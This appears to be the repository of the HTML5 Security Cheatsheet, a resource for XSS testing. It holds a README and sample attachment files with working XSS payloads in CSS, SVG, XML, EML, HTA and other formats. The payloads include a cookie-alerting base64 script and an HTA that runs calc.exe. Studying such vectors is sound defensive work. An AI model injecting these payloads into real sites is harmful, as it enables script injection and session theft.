├── .gitignore
├── LICENSE
├── README.md
├── attachments
    ├── Test.class
    ├── test.asf
    ├── test.avi
    ├── test.css
    ├── test.dtd
    ├── test.eml
    ├── test.evt
    ├── test.gif
    ├── test.hlp
    ├── test.hta
    ├── test.htc
    ├── test.html
    ├── test.jar
    ├── test.js
    ├── test.json
    ├── test.mpeg
    ├── test.pdf
    ├── test.sct
    ├── test.svg
    ├── test.swf
    ├── test.vbs
    ├── test.vml
    ├── test.wbxml
    ├── test.xbl
    ├── test.xdr
    ├── test.xml
    ├── test.xsl
    ├── test.xxe
    └── test.zip
├── bower.json
├── categories.js
├── html
    ├── images
    │   ├── chrome.png
    │   ├── cn.png
    │   ├── cs.png
    │   ├── en.png
    │   ├── firefox.png
    │   ├── ie.png
    │   ├── ja.png
    │   ├── opera.png
    │   ├── ru.png
    │   ├── safari.png
    │   ├── search.png
    │   └── tr.png
    ├── index.html
    ├── scripts
    │   ├── import.js
    │   └── jquery.js
    └── styles
    │   └── basic.css
├── items.js
├── lib
    └── index.js
├── package.json
├── payloads.js
├── r
    ├── .htaccess
    └── index.php
├── rss
    ├── .htaccess
    ├── index.php
    └── rss.txt
└── vectors.txt


/.gitignore:
--------------------------------------------------------------------------------
1 | .project
2 | node_modules
3 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Mozilla Public License, version 2.0
  2 | 
  3 | 1. Definitions
  4 | 
  5 | 1.1. "Contributor"
  6 | 
  7 |      means each individual or legal entity that creates, contributes to the
  8 |      creation of, or owns Covered Software.
  9 | 
 10 | 1.2. "Contributor Version"
 11 | 
 12 |      means the combination of the Contributions of others (if any) used by a
 13 |      Contributor and that particular Contributor's Contribution.
 14 | 
 15 | 1.3. "Contribution"
 16 | 
 17 |      means Covered Software of a particular Contributor.
 18 | 
 19 | 1.4. "Covered Software"
 20 | 
 21 |      means Source Code Form to which the initial Contributor has attached the
 22 |      notice in Exhibit A, the Executable Form of such Source Code Form, and
 23 |      Modifications of such Source Code Form, in each case including portions
 24 |      thereof.
 25 | 
 26 | 1.5. "Incompatible With Secondary Licenses"
 27 |      means
 28 | 
 29 |      a. that the initial Contributor has attached the notice described in
 30 |         Exhibit B to the Covered Software; or
 31 | 
 32 |      b. that the Covered Software was made available under the terms of
 33 |         version 1.1 or earlier of the License, but not also under the terms of
 34 |         a Secondary License.
 35 | 
 36 | 1.6. "Executable Form"
 37 | 
 38 |      means any form of the work other than Source Code Form.
 39 | 
 40 | 1.7. "Larger Work"
 41 | 
 42 |      means a work that combines Covered Software with other material, in a
 43 |      separate file or files, that is not Covered Software.
 44 | 
 45 | 1.8. "License"
 46 | 
 47 |      means this document.
 48 | 
 49 | 1.9. "Licensable"
 50 | 
 51 |      means having the right to grant, to the maximum extent possible, whether
 52 |      at the time of the initial grant or subsequently, any and all of the
 53 |      rights conveyed by this License.
 54 | 
 55 | 1.10. "Modifications"
 56 | 
 57 |      means any of the following:
 58 | 
 59 |      a. any file in Source Code Form that results from an addition to,
 60 |         deletion from, or modification of the contents of Covered Software; or
 61 | 
 62 |      b. any new file in Source Code Form that contains any Covered Software.
 63 | 
 64 | 1.11. "Patent Claims" of a Contributor
 65 | 
 66 |       means any patent claim(s), including without limitation, method,
 67 |       process, and apparatus claims, in any patent Licensable by such
 68 |       Contributor that would be infringed, but for the grant of the License,
 69 |       by the making, using, selling, offering for sale, having made, import,
 70 |       or transfer of either its Contributions or its Contributor Version.
 71 | 
 72 | 1.12. "Secondary License"
 73 | 
 74 |       means either the GNU General Public License, Version 2.0, the GNU Lesser
 75 |       General Public License, Version 2.1, the GNU Affero General Public
 76 |       License, Version 3.0, or any later versions of those licenses.
 77 | 
 78 | 1.13. "Source Code Form"
 79 | 
 80 |       means the form of the work preferred for making modifications.
 81 | 
 82 | 1.14. "You" (or "Your")
 83 | 
 84 |       means an individual or a legal entity exercising rights under this
 85 |       License. For legal entities, "You" includes any entity that controls, is
 86 |       controlled by, or is under common control with You. For purposes of this
 87 |       definition, "control" means (a) the power, direct or indirect, to cause
 88 |       the direction or management of such entity, whether by contract or
 89 |       otherwise, or (b) ownership of more than fifty percent (50%) of the
 90 |       outstanding shares or beneficial ownership of such entity.
 91 | 
 92 | 
 93 | 2. License Grants and Conditions
 94 | 
 95 | 2.1. Grants
 96 | 
 97 |      Each Contributor hereby grants You a world-wide, royalty-free,
 98 |      non-exclusive license:
 99 | 
100 |      a. under intellectual property rights (other than patent or trademark)
101 |         Licensable by such Contributor to use, reproduce, make available,
102 |         modify, display, perform, distribute, and otherwise exploit its
103 |         Contributions, either on an unmodified basis, with Modifications, or
104 |         as part of a Larger Work; and
105 | 
106 |      b. under Patent Claims of such Contributor to make, use, sell, offer for
107 |         sale, have made, import, and otherwise transfer either its
108 |         Contributions or its Contributor Version.
109 | 
110 | 2.2. Effective Date
111 | 
112 |      The licenses granted in Section 2.1 with respect to any Contribution
113 |      become effective for each Contribution on the date the Contributor first
114 |      distributes such Contribution.
115 | 
116 | 2.3. Limitations on Grant Scope
117 | 
118 |      The licenses granted in this Section 2 are the only rights granted under
119 |      this License. No additional rights or licenses will be implied from the
120 |      distribution or licensing of Covered Software under this License.
121 |      Notwithstanding Section 2.1(b) above, no patent license is granted by a
122 |      Contributor:
123 | 
124 |      a. for any code that a Contributor has removed from Covered Software; or
125 | 
126 |      b. for infringements caused by: (i) Your and any other third party's
127 |         modifications of Covered Software, or (ii) the combination of its
128 |         Contributions with other software (except as part of its Contributor
129 |         Version); or
130 | 
131 |      c. under Patent Claims infringed by Covered Software in the absence of
132 |         its Contributions.
133 | 
134 |      This License does not grant any rights in the trademarks, service marks,
135 |      or logos of any Contributor (except as may be necessary to comply with
136 |      the notice requirements in Section 3.4).
137 | 
138 | 2.4. Subsequent Licenses
139 | 
140 |      No Contributor makes additional grants as a result of Your choice to
141 |      distribute the Covered Software under a subsequent version of this
142 |      License (see Section 10.2) or under the terms of a Secondary License (if
143 |      permitted under the terms of Section 3.3).
144 | 
145 | 2.5. Representation
146 | 
147 |      Each Contributor represents that the Contributor believes its
148 |      Contributions are its original creation(s) or it has sufficient rights to
149 |      grant the rights to its Contributions conveyed by this License.
150 | 
151 | 2.6. Fair Use
152 | 
153 |      This License is not intended to limit any rights You have under
154 |      applicable copyright doctrines of fair use, fair dealing, or other
155 |      equivalents.
156 | 
157 | 2.7. Conditions
158 | 
159 |      Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in
160 |      Section 2.1.
161 | 
162 | 
163 | 3. Responsibilities
164 | 
165 | 3.1. Distribution of Source Form
166 | 
167 |      All distribution of Covered Software in Source Code Form, including any
168 |      Modifications that You create or to which You contribute, must be under
169 |      the terms of this License. You must inform recipients that the Source
170 |      Code Form of the Covered Software is governed by the terms of this
171 |      License, and how they can obtain a copy of this License. You may not
172 |      attempt to alter or restrict the recipients' rights in the Source Code
173 |      Form.
174 | 
175 | 3.2. Distribution of Executable Form
176 | 
177 |      If You distribute Covered Software in Executable Form then:
178 | 
179 |      a. such Covered Software must also be made available in Source Code Form,
180 |         as described in Section 3.1, and You must inform recipients of the
181 |         Executable Form how they can obtain a copy of such Source Code Form by
182 |         reasonable means in a timely manner, at a charge no more than the cost
183 |         of distribution to the recipient; and
184 | 
185 |      b. You may distribute such Executable Form under the terms of this
186 |         License, or sublicense it under different terms, provided that the
187 |         license for the Executable Form does not attempt to limit or alter the
188 |         recipients' rights in the Source Code Form under this License.
189 | 
190 | 3.3. Distribution of a Larger Work
191 | 
192 |      You may create and distribute a Larger Work under terms of Your choice,
193 |      provided that You also comply with the requirements of this License for
194 |      the Covered Software. If the Larger Work is a combination of Covered
195 |      Software with a work governed by one or more Secondary Licenses, and the
196 |      Covered Software is not Incompatible With Secondary Licenses, this
197 |      License permits You to additionally distribute such Covered Software
198 |      under the terms of such Secondary License(s), so that the recipient of
199 |      the Larger Work may, at their option, further distribute the Covered
200 |      Software under the terms of either this License or such Secondary
201 |      License(s).
202 | 
203 | 3.4. Notices
204 | 
205 |      You may not remove or alter the substance of any license notices
206 |      (including copyright notices, patent notices, disclaimers of warranty, or
207 |      limitations of liability) contained within the Source Code Form of the
208 |      Covered Software, except that You may alter any license notices to the
209 |      extent required to remedy known factual inaccuracies.
210 | 
211 | 3.5. Application of Additional Terms
212 | 
213 |      You may choose to offer, and to charge a fee for, warranty, support,
214 |      indemnity or liability obligations to one or more recipients of Covered
215 |      Software. However, You may do so only on Your own behalf, and not on
216 |      behalf of any Contributor. You must make it absolutely clear that any
217 |      such warranty, support, indemnity, or liability obligation is offered by
218 |      You alone, and You hereby agree to indemnify every Contributor for any
219 |      liability incurred by such Contributor as a result of warranty, support,
220 |      indemnity or liability terms You offer. You may include additional
221 |      disclaimers of warranty and limitations of liability specific to any
222 |      jurisdiction.
223 | 
224 | 4. Inability to Comply Due to Statute or Regulation
225 | 
226 |    If it is impossible for You to comply with any of the terms of this License
227 |    with respect to some or all of the Covered Software due to statute,
228 |    judicial order, or regulation then You must: (a) comply with the terms of
229 |    this License to the maximum extent possible; and (b) describe the
230 |    limitations and the code they affect. Such description must be placed in a
231 |    text file included with all distributions of the Covered Software under
232 |    this License. Except to the extent prohibited by statute or regulation,
233 |    such description must be sufficiently detailed for a recipient of ordinary
234 |    skill to be able to understand it.
235 | 
236 | 5. Termination
237 | 
238 | 5.1. The rights granted under this License will terminate automatically if You
239 |      fail to comply with any of its terms. However, if You become compliant,
240 |      then the rights granted under this License from a particular Contributor
241 |      are reinstated (a) provisionally, unless and until such Contributor
242 |      explicitly and finally terminates Your grants, and (b) on an ongoing
243 |      basis, if such Contributor fails to notify You of the non-compliance by
244 |      some reasonable means prior to 60 days after You have come back into
245 |      compliance. Moreover, Your grants from a particular Contributor are
246 |      reinstated on an ongoing basis if such Contributor notifies You of the
247 |      non-compliance by some reasonable means, this is the first time You have
248 |      received notice of non-compliance with this License from such
249 |      Contributor, and You become compliant prior to 30 days after Your receipt
250 |      of the notice.
251 | 
252 | 5.2. If You initiate litigation against any entity by asserting a patent
253 |      infringement claim (excluding declaratory judgment actions,
254 |      counter-claims, and cross-claims) alleging that a Contributor Version
255 |      directly or indirectly infringes any patent, then the rights granted to
256 |      You by any and all Contributors for the Covered Software under Section
257 |      2.1 of this License shall terminate.
258 | 
259 | 5.3. In the event of termination under Sections 5.1 or 5.2 above, all end user
260 |      license agreements (excluding distributors and resellers) which have been
261 |      validly granted by You or Your distributors under this License prior to
262 |      termination shall survive termination.
263 | 
264 | 6. Disclaimer of Warranty
265 | 
266 |    Covered Software is provided under this License on an "as is" basis,
267 |    without warranty of any kind, either expressed, implied, or statutory,
268 |    including, without limitation, warranties that the Covered Software is free
269 |    of defects, merchantable, fit for a particular purpose or non-infringing.
270 |    The entire risk as to the quality and performance of the Covered Software
271 |    is with You. Should any Covered Software prove defective in any respect,
272 |    You (not any Contributor) assume the cost of any necessary servicing,
273 |    repair, or correction. This disclaimer of warranty constitutes an essential
274 |    part of this License. No use of  any Covered Software is authorized under
275 |    this License except under this disclaimer.
276 | 
277 | 7. Limitation of Liability
278 | 
279 |    Under no circumstances and under no legal theory, whether tort (including
280 |    negligence), contract, or otherwise, shall any Contributor, or anyone who
281 |    distributes Covered Software as permitted above, be liable to You for any
282 |    direct, indirect, special, incidental, or consequential damages of any
283 |    character including, without limitation, damages for lost profits, loss of
284 |    goodwill, work stoppage, computer failure or malfunction, or any and all
285 |    other commercial damages or losses, even if such party shall have been
286 |    informed of the possibility of such damages. This limitation of liability
287 |    shall not apply to liability for death or personal injury resulting from
288 |    such party's negligence to the extent applicable law prohibits such
289 |    limitation. Some jurisdictions do not allow the exclusion or limitation of
290 |    incidental or consequential damages, so this exclusion and limitation may
291 |    not apply to You.
292 | 
293 | 8. Litigation
294 | 
295 |    Any litigation relating to this License may be brought only in the courts
296 |    of a jurisdiction where the defendant maintains its principal place of
297 |    business and such litigation shall be governed by laws of that
298 |    jurisdiction, without reference to its conflict-of-law provisions. Nothing
299 |    in this Section shall prevent a party's ability to bring cross-claims or
300 |    counter-claims.
301 | 
302 | 9. Miscellaneous
303 | 
304 |    This License represents the complete agreement concerning the subject
305 |    matter hereof. If any provision of this License is held to be
306 |    unenforceable, such provision shall be reformed only to the extent
307 |    necessary to make it enforceable. Any law or regulation which provides that
308 |    the language of a contract shall be construed against the drafter shall not
309 |    be used to construe this License against a Contributor.
310 | 
311 | 
312 | 10. Versions of the License
313 | 
314 | 10.1. New Versions
315 | 
316 |       Mozilla Foundation is the license steward. Except as provided in Section
317 |       10.3, no one other than the license steward has the right to modify or
318 |       publish new versions of this License. Each version will be given a
319 |       distinguishing version number.
320 | 
321 | 10.2. Effect of New Versions
322 | 
323 |       You may distribute the Covered Software under the terms of the version
324 |       of the License under which You originally received the Covered Software,
325 |       or under the terms of any subsequent version published by the license
326 |       steward.
327 | 
328 | 10.3. Modified Versions
329 | 
330 |       If you create software not governed by this License, and you want to
331 |       create a new license for such software, you may create and use a
332 |       modified version of this License if you rename the license and remove
333 |       any references to the name of the license steward (except to note that
334 |       such modified license differs from this License).
335 | 
336 | 10.4. Distributing Source Code Form that is Incompatible With Secondary
337 |       Licenses If You choose to distribute Source Code Form that is
338 |       Incompatible With Secondary Licenses under the terms of this version of
339 |       the License, the notice described in Exhibit B of this License must be
340 |       attached.
341 | 
342 | Exhibit A - Source Code Form License Notice
343 | 
344 |       This Source Code Form is subject to the
345 |       terms of the Mozilla Public License, v.
346 |       2.0. If a copy of the MPL was not
347 |       distributed with this file, You can
348 |       obtain one at
349 |       http://mozilla.org/MPL/2.0/.
350 | 
351 | If it is not possible or desirable to put the notice in a particular file,
352 | then You may include the notice in a location (such as a LICENSE file in a
353 | relevant directory) where a recipient would be likely to look for such a
354 | notice.
355 | 
356 | You may add additional accurate notices of copyright ownership.
357 | 
358 | Exhibit B - "Incompatible With Secondary Licenses" Notice
359 | 
360 |       This Source Code Form is "Incompatible
361 |       With Secondary Licenses", as defined by
362 |       the Mozilla Public License, v. 2.0.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | HTML5 Security Cheatsheet
 2 | ====
 3 | 
 4 | This is the new home of the H5SC or HTML5 Security Cheatsheet. Here you will find three things:
 5 | 
 6 |  * A collection of HTML5 related XSS attack vectors
 7 |  * A set of useful files for XSS testing
 8 |  * A set of formerly hidden features useful for XSS testing
 9 | 
10 | ## The XSS Vectors
11 | 
12 | The collection of XSS vectors can be found here: https://html5sec.org/
13 | 
14 | ## Useful Files
15 | 
16 | We published a list of files useful for XSS testing in various situations. Currently the following files are available:
17 | 
18 |  * https://html5sec.org/test.asf
19 |  * https://html5sec.org/test.avi
20 |  * https://html5sec.org/test.css
21 |  * https://html5sec.org/test.dtd
22 |  * https://html5sec.org/test.eml
23 |  * https://html5sec.org/test.evt
24 |  * https://html5sec.org/test.gif
25 |  * https://html5sec.org/test.hlp
26 |  * https://html5sec.org/test.hta
27 |  * https://html5sec.org/test.htc
28 |  * https://html5sec.org/test.html
29 |  * https://html5sec.org/test.jar
30 |  * https://html5sec.org/test.js
31 |  * https://html5sec.org/test.json
32 |  * https://html5sec.org/test.mpeg
33 |  * https://html5sec.org/test.pdf
34 |  * https://html5sec.org/test.sct
35 |  * https://html5sec.org/test.svg
36 |  * https://html5sec.org/test.swf
37 |  * https://html5sec.org/test.vbs
38 |  * https://html5sec.org/test.vml
39 |  * https://html5sec.org/test.wbxml
40 |  * https://html5sec.org/test.xbl
41 |  * https://html5sec.org/test.xdr
42 |  * https://html5sec.org/test.xml
43 |  * https://html5sec.org/test.xsl
44 |  * https://html5sec.org/test.xxe
45 |  * https://html5sec.org/test.zip
46 |  * https://html5sec.org/Test.class
47 | 
48 | Pull requests welcome, we store the files in the `/attachments` sub-folder.
49 | 
50 | ## Hidden Features
51 | 
52 | The H5SC currently has three "hidden" features
53 | 
54 |  * An RSS mode to test feed readers: https://html5sec.org/rss
55 |   * `/rss/+/` gives a unix timestamp 300 seconds in future (for ease use)
56 |   * `/rss/+123/` gives a unix timestamp 123 seconds in future
57 |   * `/rss/1234/` will serve a minimal rss feed until unix time is 1234. 
58 |  * A JavaScript function to return all vectors as string, isolated and numbered: Go [here](https://html5sec.org/) and execute `vectors()`
59 |  * All H5SC vectors in [one text file](https://raw.githubusercontent.com/cure53/H5SC/master/vectors.txt) for easy copy & paste
60 |  * A useful search API via GET
61 |   * Want all vectors related to `innerHTML`? Open https://html5sec.org/?innerHTML
62 |   * Want to link a specific vector? Open https://html5sec.org/#123
63 |  * A redirect API resolving to a URL containing XSS payload
64 |   *  Data URI, no special status: https://html5sec.org/r/data/
65 |   *  Data URI, status code `307`: https://html5sec.org/r/data/307
66 |   *  JavaScript URI, status code `301`: https://html5sec.org/r/javascript/301
67 |   *  Supported status codes are: `301`, `302`, `303`, `307`, `308`, `999`
68 |   *  Supported schemes are: `data`, `javascript`, `jar`, `script` (redirecting to https://html5sec.org/%3cscript>alert(1)%3c/script>/)
69 |  * More to come soon!
70 |  
71 | 


--------------------------------------------------------------------------------
/attachments/Test.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/Test.class


--------------------------------------------------------------------------------
/attachments/test.asf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.asf


--------------------------------------------------------------------------------
/attachments/test.avi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.avi


--------------------------------------------------------------------------------
/attachments/test.css:
--------------------------------------------------------------------------------
1 | * {
2 | 	color:          red;
3 | 	-o-link:        'javascript:alert(1)';
4 | 	-o-link-source: current;
5 | 	x:              expression(write(1));
6 | }
7 | 


--------------------------------------------------------------------------------
/attachments/test.dtd:
--------------------------------------------------------------------------------
1 | <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
2 | 


--------------------------------------------------------------------------------
/attachments/test.eml:
--------------------------------------------------------------------------------
 1 | ABCDEFGHIJK
 2 | GARBAGE HERE
 3 | ABCDEFGHIJK
 4 | JUST NO TWO NEWLINES
 5 | Content-Type: text/html
 6 | Content-Transfer-Encoding: quoted-printable
 7 | 
 8 | =3cs=
 9 | cr=
10 | ipt=3e
11 | =61le=
12 | rt=28docu=
13 | ment=2e=
14 | dom=61=
15 | in=29
16 | =3c=2f=
17 | script=3e
18 | 
19 | 


--------------------------------------------------------------------------------
/attachments/test.evt:
--------------------------------------------------------------------------------
1 | <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/attachments/test.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.gif


--------------------------------------------------------------------------------
/attachments/test.hlp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.hlp


--------------------------------------------------------------------------------
/attachments/test.hta:
--------------------------------------------------------------------------------
1 | <textarea id="x" style="width:95%;height:200px;">new ActiveXObject('WScript.Shell').Run('calc.exe')</textarea>
2 | <hr>
3 | <button onclick="eval(x.value)">eval()</button>
4 | 


--------------------------------------------------------------------------------
/attachments/test.htc:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?><x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>
2 | 


--------------------------------------------------------------------------------
/attachments/test.html:
--------------------------------------------------------------------------------
1 | <html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg -- </body> </html>
2 | 


--------------------------------------------------------------------------------
/attachments/test.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.jar


--------------------------------------------------------------------------------
/attachments/test.js:
--------------------------------------------------------------------------------
1 | alert(1)
2 | 


--------------------------------------------------------------------------------
/attachments/test.json:
--------------------------------------------------------------------------------
1 | {"xss":alert(1), "url": "javascript:alert(1)"}
2 | 


--------------------------------------------------------------------------------
/attachments/test.mpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.mpeg


--------------------------------------------------------------------------------
/attachments/test.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.pdf


--------------------------------------------------------------------------------
/attachments/test.sct:
--------------------------------------------------------------------------------
1 | <SCRIPTLET>
2 |    <IMPLEMENTS Type="Behavior"></IMPLEMENTS>
3 |    <SCRIPT Language="javascript">alert(1)</SCRIPT>
4 | </SCRIPTLET>
5 | 


--------------------------------------------------------------------------------
/attachments/test.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg">
2 |     <script>alert(1)</script>
3 | </svg>
4 | 


--------------------------------------------------------------------------------
/attachments/test.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.swf


--------------------------------------------------------------------------------
/attachments/test.vbs:
--------------------------------------------------------------------------------
1 | msgbox 1
2 | 


--------------------------------------------------------------------------------
/attachments/test.vml:
--------------------------------------------------------------------------------
1 | <xml><rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /></xml>
2 | 


--------------------------------------------------------------------------------
/attachments/test.wbxml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.wbxml


--------------------------------------------------------------------------------
/attachments/test.xbl:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[alert(1)]]></constructor></implementation></binding></bindings>
2 | 


--------------------------------------------------------------------------------
/attachments/test.xdr:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?><Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"><ElementType name="img"><AttributeType name="src" required="yes" default="x"/><AttributeType name="onerror" required="yes" default="alert(1)"/><attribute type="src"/><attribute type="onerror"/></ElementType></Schema>
2 | 


--------------------------------------------------------------------------------
/attachments/test.xml:
--------------------------------------------------------------------------------
1 | <html>
2 | <head></head>
3 | <body>
4 | <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
5 | </body>
6 | </html>
7 | 


--------------------------------------------------------------------------------
/attachments/test.xsl:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" ?>
2 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
3 | 	<xsl:template match="/">
4 | 		<script>alert(1)</script>
5 | 	</xsl:template>
6 | </xsl:stylesheet>
7 | 


--------------------------------------------------------------------------------
/attachments/test.xxe:
--------------------------------------------------------------------------------
1 | <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/attachments/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/attachments/test.zip


--------------------------------------------------------------------------------
/bower.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "h5sc",
 3 |   "version": "0.0.0",
 4 |   "main": [
 5 |     "items.js",
 6 |   "payloads.js",
 7 |   "categories.js"
 8 |     ]
 9 | }
10 | 


--------------------------------------------------------------------------------
/categories.js:
--------------------------------------------------------------------------------
  1 | /* Categories - the available categories */
  2 | (function (root, factory) {
  3 |     if (typeof define === 'function' && define.amd) {
  4 |         // AMD. Register as an anonymous module.
  5 |         define([], factory);
  6 |     } else if (typeof exports === 'object') {
  7 |         // Node. Does not work with strict CommonJS, but
  8 |         // only CommonJS-like environments that support module.exports,
  9 |         // like Node.
 10 |         module.exports = factory();
 11 |     } else {
 12 |         // Browser globals (root is window)
 13 |         root.categories = factory();
 14 |   }
 15 | }(this, function () {
 16 | return {
 17 |     'html5'         : {
 18 |         'en' : 'Vectors making use of HTML5 features',
 19 |         'ja' : 'HTML5\u306e\u6a5f\u80fd\u3092\u4f7f\u3063\u305f\u624b\u6cd5',
 20 |         'ru' : 'HTML5',
 21 |         'cs' : 'Útoky využívající možností HTML5',
 22 |         'de' : '',
 23 |         'tr' : 'HTML5 özelliklerinden yararlanan vektörler',
 24 | 		'zh' : 'HTML5特性向量'
 25 |     },
 26 |     'html'          : {
 27 |         'en' : 'Vectors working on HTML4 and older versions',
 28 |         'ja' : 'HTML4\u4ee5\u524d\u3067\u6a5f\u80fd\u3059\u308b\u624b\u6cd5',
 29 |         'ru' : 'HTML4↓',
 30 |         'cs' : 'Útoky fungující v HTML4 a starších',
 31 |         'de' : '',
 32 |         'tr' : 'HTML4 ve eski versiyonlarında çalışan vektörler',
 33 | 		'zh' : 'HTML4和一些老的向量'
 34 |     },
 35 |     'css'           : {
 36 |         'en' : 'Cascading stylesheet injection based vectors',
 37 |         'ja' : '\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306b\u3088\u308b\u624b\u6cd5',
 38 |         'ru' : 'CSS',
 39 |         'cs' : 'Útoky založené na injektáži CSS',
 40 |         'de' : '',
 41 |         'tr' : 'CSS enjeksiyonu tabanlı vektörler',
 42 | 		'zh' : '基于CSS注入的向量'
 43 |     },
 44 |     'javascript'    : {
 45 |         'en' : 'Plain JavaScript vectors',
 46 |         'ja' : '\u30d7\u30ec\u30fc\u30f3\u306aJavaScript\u306b\u3088\u308b\u624b\u6cd5',
 47 |         'ru' : 'JavaScript',
 48 |         'cs' : 'Útoky obyčejným JavaScriptem',
 49 |         'de' : '',
 50 |         'tr' : 'Düz JavaScript Vektörleri',
 51 | 		'zh' : '纯javascript的向量'
 52 |     },
 53 |     'e4x'           : {
 54 |         'en' : 'E4X vectors working on gecko based browsers',
 55 |         'ja' : 'Gecko\u30d9\u30fc\u30b9\u306e\u30d6\u30e9\u30a6\u30b6\u306b\u5bfe\u3059\u308bE4X\u306b\u3088\u308b\u624b\u6cd5',
 56 |         'ru' : 'E4X',
 57 |         'cs' : 'Útoky založené na E4X v prohlížečích s jádrem Gecko',
 58 |         'de' : '',
 59 |         'tr' : 'Gecko tabanlı tarayıcılarda çalışan E4X vektörleri',
 60 | 		'zh' : 'E4X向量'
 61 |     },
 62 |     'dom'           : {
 63 |         'en' : 'Vectors attacking DOM properties and methods',
 64 |         'ja' : 'DOM\u30d7\u30ed\u30d1\u30c6\u30a3\u3001\u30e1\u30bd\u30c3\u30c9\u3092\u5229\u7528\u3057\u305f\u624b\u6cd5',
 65 |         'ru' : 'DOM',
 66 |         'cs' : 'Útoky na vlastnosti a metody DOM',
 67 |         'de' : '',
 68 |         'tr' : 'DOM özelliklerine ve metotlarına saldıran vektörler',
 69 |         'zh' : 'DOM属性与方法的攻击向量'
 70 |     },
 71 |     'json'          : {
 72 |         'en' : 'JSON based vectors',
 73 |         'ja' : 'JSON\u30d9\u30fc\u30b9\u306e\u624b\u6cd5',
 74 |         'ru' : 'JSON',
 75 |         'cs' : 'Útoky založené na JSON',
 76 |         'de' : '',
 77 |         'tr' : 'JSON tabanlı vektörler',
 78 | 		'zh' : '基于JSON的向量'
 79 |     },
 80 |     'svg'           : {
 81 |         'en' : 'Vectors embedded in SVG files',
 82 |         'ja' : 'SVG\u30d5\u30a1\u30a4\u30eb\u3078\u306e\u57cb\u3081\u8fbc\u307f\u306b\u3088\u308b\u624b\u6cd5',
 83 |         'ru' : 'SVG',
 84 |         'cs' : 'Útoky ukryté v SVG',
 85 |         'de' : '',
 86 |         'tr' : 'SVG dosyalarına gömülü vektörler',
 87 | 		'zh' : 'SVG内的向量'
 88 |     },
 89 |     'xml'           : {
 90 |         'en' : 'Vectors related to X(HT)ML',
 91 |         'ja' : 'X\u0028HT\u0029ML\u306b\u95a2\u9023\u3059\u308b\u624b\u6cd5',
 92 |         'ru' : 'X(HT)ML',
 93 |         'cs' : 'Útoky svázané s X(HT)ML',
 94 |         'de' : '',
 95 |         'tr' : 'X(HT)ML ile ilgili vektörler',
 96 |         'zh' : 'X(HT)ML相关向量'
 97 |     },
 98 |     'charset'       : {
 99 |         'en' : 'UTF7 and other exotic charset based vectors',
100 |         'ja' : 'UTF-7\u306a\u3069\u306e\u7279\u6b8a\u306a\u6587\u5b57\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306b\u3088\u308b\u624b\u6cd5',
101 |         'ru' : 'UTF-7 и др. экзот. код-ки',
102 |         'cs' : 'Útoky založené na UTF-7 a dalších exotických znakových sadách',
103 |         'de' : '',
